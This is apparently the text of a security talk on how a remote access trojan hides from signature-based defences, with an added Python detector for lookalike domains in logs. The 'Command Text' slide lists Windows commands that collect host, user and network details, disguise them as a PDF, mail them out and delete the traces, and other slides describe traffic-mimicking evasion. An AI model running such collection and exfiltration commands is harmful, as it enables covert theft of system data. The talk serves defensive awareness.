Hiding in Plain Sight
Rob Gillen@argodev
This work is licensed under a Creative Commons Attribution 3.0 License.
Disclaimer
The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of my employer nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
HTDCS
Helpdesk Ticket Driven Cyber Security
CHALLENGES OF SIGNATURE TOOLS
Demonstration
Network Overview
Attack Pattern
Client Compromise (Simple)
Client Compromise (Encoded & SSL)
Overview
• RAT Design
• Encryption
• Command/Control (C2)
• AntiVirus
• Behavior
RAT Design
• Exe is dropped via infected page
• Queries web page for commands
• Performs commands if not done previously
• Periodically polls for new commands
Encryption
• Complex encryption is trivial
• PBKDF – Scrypt sequential memory-hard function
• Many iterations (> 10K)
• Long key lengths
Encryption Example
• Above configuration is custom-hardware resistant
– Takes approximately ¼ second per guess
Command/Control
• Use Web2C approach
– Commands are “issued” en masse via normal, benign-looking web pages
– Common ports
– Leverages existing HTML/server constructs
Command Text
ipconfig /all > %APPDATA%\info.txt
net start >> %APPDATA%\info.txt
tasklist /v >> %APPDATA%\info.txt
net user >> %APPDATA%\info.txt
net localgroup administrators >> %APPDATA%\info.txt
netstat -ano >> %APPDATA%\info.txt
net use >> %APPDATA%\info.txt
copy %APPDATA%\info.txt %APPDATA%\output.pdf
del %APPDATA%\info.txt
sendmail %APPDATA%\output.pdf Status Update “Jones, William E. [email protected]” [email protected] smtp.yourorg.gov
del %APPDATA%\output.pdf
Mimic User Behavior
• Traffic Rates
– Monitor incoming/outgoing network traffic for X days
– Configure xfil to stay within X% of “normal”
• C2
– Exponential/randomized stand-down
– Only comm during periods of activity
Mimic User Behavior
• Target URLs
– Monitor outgoing web queries/URLs for X days
– Use similar domain names for malicious traffic
– Append similar/same query strings to malicious requests
Hiding in Logs
v-client-5b.sjc.dropbox.com
snt-re3-9a.sjc.dropbox.com
yn-in-f125.1e100.net
l1.ycs.vip.dcb.yahoo.com
snt-re3-9a.sjc.drpbox.com
ip-69-31-29-228.nlayer.net
a23-47-20-211.deploy.static.akamaitechnologies.com
l3.ycs.vip.dcb.yahoo.com
ir2.fp.vip.bf1.yahoo.com
www.nbcnews.com.edgesuite.net
wac.946A.edgecastcdn.net
a2.twimg.com
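The two slides above make the same defensive point from opposite sides: a host such as snt-re3-9a.sjc.drpbox.com reuses a real Dropbox host prefix and sits one character away from dropbox.com, so it disappears in a log column. The following detector is an added example, not code from the talk; it takes a baseline of registrable domains learned from a clean window (constructed here) and flags log hostnames whose registrable domain is absent from the baseline but within a small edit distance of a known one, or whose subdomain prefix was already seen under a different baseline domain. The registrable-domain split is a deliberately naive "last two labels" rule; a production version would use the Public Suffix List.

```python
"""Lookalike-domain detection over proxy/DNS log hostnames (added example)."""


def registrable_domain(host):
    """Naive registrable domain: last two labels (assumption: no multi-part TLDs).
    Real deployments should use the Public Suffix List instead."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def levenshtein(a, b):
    """Edit distance between two strings (insert/delete/substitute cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,        # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def find_lookalikes(hosts, baseline, max_distance=2):
    """Return alerts for hosts whose domain is not in the baseline but either
    (a) is within max_distance edits of a baseline domain, or
    (b) reuses a subdomain prefix already seen under a baseline domain."""
    # Learn which subdomain prefixes occur with which trusted domains.
    prefix_seen_with = {}
    for host in hosts:
        dom = registrable_domain(host)
        if dom in baseline:
            prefix = host.lower()[: -len(dom) - 1]
            prefix_seen_with.setdefault(prefix, set()).add(dom)

    alerts = []
    for host in hosts:
        dom = registrable_domain(host)
        if dom in baseline:
            continue
        nearest, dist = min(((k, levenshtein(dom, k)) for k in baseline),
                            key=lambda kv: kv[1])
        prefix = host.lower()[: -len(dom) - 1]
        reused = sorted(prefix_seen_with.get(prefix, set()))
        if dist <= max_distance or reused:
            alerts.append({"host": host, "domain": dom, "nearest": nearest,
                           "distance": dist, "prefix_seen_with": reused})
    return alerts


# Constructed sample log column, mirroring the kind of list shown on the slide.
SAMPLE_LOG_HOSTS = [
    "v-client-5b.sjc.dropbox.com",
    "snt-re3-9a.sjc.dropbox.com",
    "yn-in-f125.1e100.net",
    "l1.ycs.vip.dcb.yahoo.com",
    "snt-re3-9a.sjc.drpbox.com",
    "ip-69-31-29-228.nlayer.net",
    "a23-47-20-211.deploy.static.akamaitechnologies.com",
    "www.nbcnews.com.edgesuite.net",
    "a2.twimg.com",
]

# Constructed baseline: registrable domains observed during a clean learning window.
BASELINE_DOMAINS = {"dropbox.com", "1e100.net", "yahoo.com", "nlayer.net",
                    "akamaitechnologies.com", "edgesuite.net", "twimg.com"}


if __name__ == "__main__":
    for alert in find_lookalikes(SAMPLE_LOG_HOSTS, BASELINE_DOMAINS):
        print("LOOKALIKE {host}: domain {domain!r} is {distance} edit(s) from "
              "{nearest!r}; prefix previously seen with {prefix_seen_with}"
              .format(**alert))
```

Only drpbox.com fires on the sample: it is one edit from dropbox.com and its prefix snt-re3-9a.sjc was previously logged under the real domain. Tuning `max_distance` trades false positives (short, common domains collide easily) against missed variants; the prefix-reuse signal is what catches the "append similar/same query strings" tactic even when the edit distance is larger.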
Other Hiding Techniques
• Office file content embedding
• Creative location
Next Steps
• Know what you can and can’t see
• Consider implications of your monitoring strategy
• Behavior *must* play a role
Questions/Contact
Rob Gillen
[email protected]
rob.gillenfamily.net
@argodev